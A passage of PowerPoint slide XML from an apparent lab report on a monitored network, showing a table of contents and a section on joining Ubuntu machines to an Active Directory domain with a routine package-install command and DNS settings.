              </a:rPr>
              <a:t>Adding</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-6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12" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Organizational</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-55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12" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Units,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65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2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Groups</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-4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2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-6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2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-18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dirty="0" sz="1100" spc="-80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId12" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>.......................................................................16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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId13" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45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dirty="0" sz="1100" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId13" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Joining</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId13" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35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13" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-40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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-125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13" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>.........................................................................................19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 spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId13" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Installing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-60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dirty="0" sz="1100" spc="-80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId13" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>packages:................................................................................................................19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 spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId13" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Update</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65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dirty="0" sz="1100" spc="80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId13" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-75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13" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Settings:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-135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13" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>.............................................................................................................19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 spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId14" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Discover</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-75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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId14" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> Join </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId14" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-55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 spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId14" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Active</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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 spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId14" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-55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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35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 spc="-80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId14" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>........................................................................20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 spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId14" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>SplunkForwarder</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65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14" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Setup</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-20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14" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>......................................................................................20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40"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId14" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Downloading</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-7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dirty="0" sz="1100" spc="-80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId14" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Installing:....................................................................................................20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 spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId15" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Adding</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId15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15" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Local</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-75">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId15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5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId15" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId15" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Logs:...................................................................................................21</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" marL="152400" marR="5080" indent="-140335">
              <a:lnSpc>
                <a:spcPct val="147300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Honeypot</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-85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 spc="55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>DHCP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-100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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="165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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-85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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Syslog</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-95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16" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-85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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-85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 spc="-80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>vRouter......................................................22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16" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Configuring</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50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 spc="55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>DHCP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-70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16" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Pool:..........................................................................................................22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 spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Configuring</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100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 spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>vRouter</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Syslog Messages</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-70">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Forwarding:...................................................................22</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" marL="152400" marR="5080" indent="-140335">
              <a:lnSpc>
                <a:spcPct val="147200"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId17" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Simulating</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId17" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId17" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId17" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId17" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId17" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId17" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-65">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId17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17" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId17" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId17" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>METRO!</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-90">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId17" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> ....................................................................................23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  <a:hlinkClick r:id="rId17" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>METRO!!:................................................................................................................................23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545089"/>
            <a:ext cx="5925820" cy="3245485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2000" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-16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55">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Joining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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-17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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-17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E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="127000">
              <a:lnSpc>
                <a:spcPct val="110100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550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followed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guide,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Ubuntu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22.04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LTS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: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Join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in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Active</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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: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Server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World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(server-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-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u="sng" sz="1100" spc="-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world.i)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-90">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-65">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>join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20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>our</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-85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Ubuntu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machines</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-90">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>to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45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>the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20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>domain.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 spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>The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25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>guide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35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>provided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35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>detailed</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-65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steps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55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>for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25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>entire </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>process.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Installing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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packages:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="12700" marR="10160">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="484"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>We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ran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the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following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command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install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the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packages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required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to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join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our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Ubuntu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machines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to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the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-15">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> domain: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60" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>apt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-120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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-85" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>y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install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realmd</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-105" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="35" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>sssd</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-105" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="25" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>sssd-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-15" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>tools</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-114" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>libnss-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="60" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>sss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libpam-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="55" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>sss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15" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>adcli</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-125" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>samba-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="25" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>common-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="1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oddjob</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-114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oddjob-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>mkhomedir</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-114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packagekit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Update</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="16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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="16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Settings:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="109100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Configuring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the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Domain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Controller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as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the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> machines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70">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DNS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sever</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> is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needed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100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="1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join</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1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machine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00">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="1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 spc="-20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>domain.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did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through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settings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GUI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like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so.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229994"/>
            <a:ext cx="2413000" cy="3251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7288" y="2350135"/>
            <a:ext cx="3124327" cy="213741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6740906"/>
            <a:ext cx="5943600" cy="25907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776131"/>
            <a:ext cx="5941695" cy="146558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60">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
